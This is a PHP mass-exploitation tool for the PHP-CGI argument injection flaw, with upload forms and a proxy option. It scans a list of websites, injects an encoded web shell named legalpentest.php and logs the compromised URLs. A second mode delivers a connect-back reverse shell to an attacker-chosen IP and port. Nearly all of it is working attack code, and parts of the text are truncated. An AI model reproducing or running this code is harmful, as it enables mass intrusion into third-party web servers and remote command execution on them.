PHP CGI Argument Injection

Coded by: Mostafa Azizi (admin[@]0-Day[dot]net)

Mass File Uploader

Reverse Shell


Please specify a file to scan:
*

Please specify a file to upload:
*

Specify a port (default is 80):

Proxy (ip:port):

* fields are required



Hostname (ex: www.sitename.com):

Your IP (ex: 173.194.35.169):

Your Port (ex: 80):



All fields are required


'; $host = $_POST['host']; $lip = $_POST['lip']; $lport = $_POST['lport']; $port = $_POST['port']; $proxy = $_POST['proxy']; $list = file($_FILES['listfile']['tmp_name']); $file = base64_encode(gzdeflate(file_get_contents($_FILES['datafile']['tmp_name']))); $shell = "gzinflate(base64_decode(\"$file\"))"; if (isset($_POST['Submit2']) && $host != '' && $lip != '' && $lport != '') { /*pentestmonkey's php-reverse-shell. Limitations: proc_open and stream_set_blocking require PHP version 4.3+, or 5+ */ /* Connect Back */ $payload = " array(\"pipe\", \"r\"),1 => array(\"pipe\", \"w\"), 2 => array(\"pipe\", \"w\"));\$process = proc_open(\$shell, \$descriptorspec, \$pipes);if (!is_resource(\$process)) { printit(\"ERROR: Can't spawn shell\"); exit(1);}stream_set_blocking(\$pipes[0], 0);stream_set_blocking(\$pipes[1], 0);stream_set_blocking(\$pipes[2], 0);stream_set_blocking(\$sock, 0);printit(\"Successfully opened reverse shell to \$ip:\$port\"); while (1) { if (feof(\$sock)) { printit(\"ERROR: Shell connection terminated\"); break;} if (feof(\$pipes[1])) {printit(\"ERROR: Shell process terminated\");break;}\$read_a = array(\$sock, \$pipes[1], \$pipes[2]);\$num_changed_sockets = stream_select(\$read_a, \$write_a, \$error_a, null);if (in_array(\$sock, \$read_a)) {if (\$debug) printit(\"SOCK READ\");\$input = fread(\$sock, \$chunk_size);if(\$debug) printit(\"SOCK: \$input\");fwrite(\$pipes[0], \$input);}if (in_array(\$pipes[1], \$read_a)) {if (\$debug) printit(\"STDOUT READ\");\$input = fread(\$pipes[1], \$chunk_size);if (\$debug) printit(\"STDOUT: \$input\");fwrite(\$sock, \$input);}if (in_array(\$pipes[2], \$read_a)) {if (\$debug) printit(\"STDERR READ\");\$input = fread(\$pipes[2], \$chunk_size); if (\$debug) printit(\"STDERR: \$input\");fwrite(\$sock, \$input);}}fclose(\$sock);fclose(\$pipes[0]);fclose(\$pipes[1]);fclose(\$pipes[2]);proc_close(\$process);function printit (\$string) {if (!\$daemon) {print \"\$string\n\";}} ?>"; $packet = "POST 
".$p."/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "User-Agent: PHP CGI Argument Injection Exploiter\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n\r\n"; $packet .= $payload."\r\n\r\n\r\n\r\n"; sendpacket($packet,1,0,0); }elseif (isset($_POST['Submit']) && $list != '' && $file != '') { if ($port=='') {$port=80;} for ($n =0; $n < count($list); $n++) { $siteAddbackup = $list[$n]; $siteAdd=str_replace("http://","",$siteAddbackup); preg_match('/^(?:(?:http|https):\/\/)?[^\/]+(\/.+\/)[^\/\.]+\.[^\/\.]+$/i',$siteAddbackup, $match); $path = $match[1]; $pa = strstr(trim($siteAdd),$path); $host=trim(str_replace($pa,"",$siteAdd)); if ($path ==''){$path = "/"; } if ($proxy=='') {$p=$path;} else {$p='http://'.$host.$path;} /* Checking Availability */ $connection = fsockopen($host,$port); if (!$connection) // site is down { echo ' No response from '.htmlentities($host).' ...
'; file_put_contents(realpath(dirname(__FILE__)).'/notconnected.txt', $siteAddbackup."\r\n", FILE_APPEND); } else // site is up { fclose($connection); Exploitable($host,$path,$p); } } } Function Exploitable($host,$path,$p) { global $html; $i=0; /* Checking Exploitability */ $packet = "GET ".$p."?-s HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "User-Agent: PHP CGI Argument Injection Exploiter \r\n\r\n"; sendpacket($packet,1,0,0); $str = array( ' $search){ if(stristr($html, $search) == TRUE) {$i=$i+1;}} switch($i) { case 0: echo ''.$host.' Faild!
'; break; case 2: echo ''.$host.' Exploitable
'; Exploit($host,$path,$p); } } Function Exploit($host,$path,$p) { global $html, $shell; /* Exploiting */ $payload = "
Exploit Faild...
-------------------------------------------------------
'; } else { echo "
Exploit Succeeded...
http://$host$path"."/legalpentest.php
-------------------------------------------------------
"; file_put_contents(realpath(dirname(__FILE__)).'/shell.txt', "http://$host$path"."/legalpentest.php\r\n", FILE_APPEND); } } function sendpacket($packet,$response = 0,$output = 0,$s=0) { $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; global $proxy, $host, $port, $html, $user, $pass; if ($proxy == '') { $ock = fsockopen($host,$port); stream_set_timeout($ock, 5); if (!$ock) { echo 'No response from '.htmlentities($host).' ...
'; stream_set_timeout($ock, 4); } } else { $parts = explode(':',$proxy); // echo 'Connecting to proxy: '.$parts[0].':'.$parts[1].' ...

'; $ock = fsockopen($parts[0],$parts[1]); stream_set_timeout($ock, 5); if (!$ock) { echo 'No response from proxy...
'; fclose($ock); } } if ($ock) { fputs($ock,$packet); if ($response == 1) { if ($proxy == '') { $html = ''; while (!feof($ock)) { $html .= fgets($ock); } } else { $html = ''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html .= fread($ock,1); } } } else $html = ''; fclose($ock); } } ?>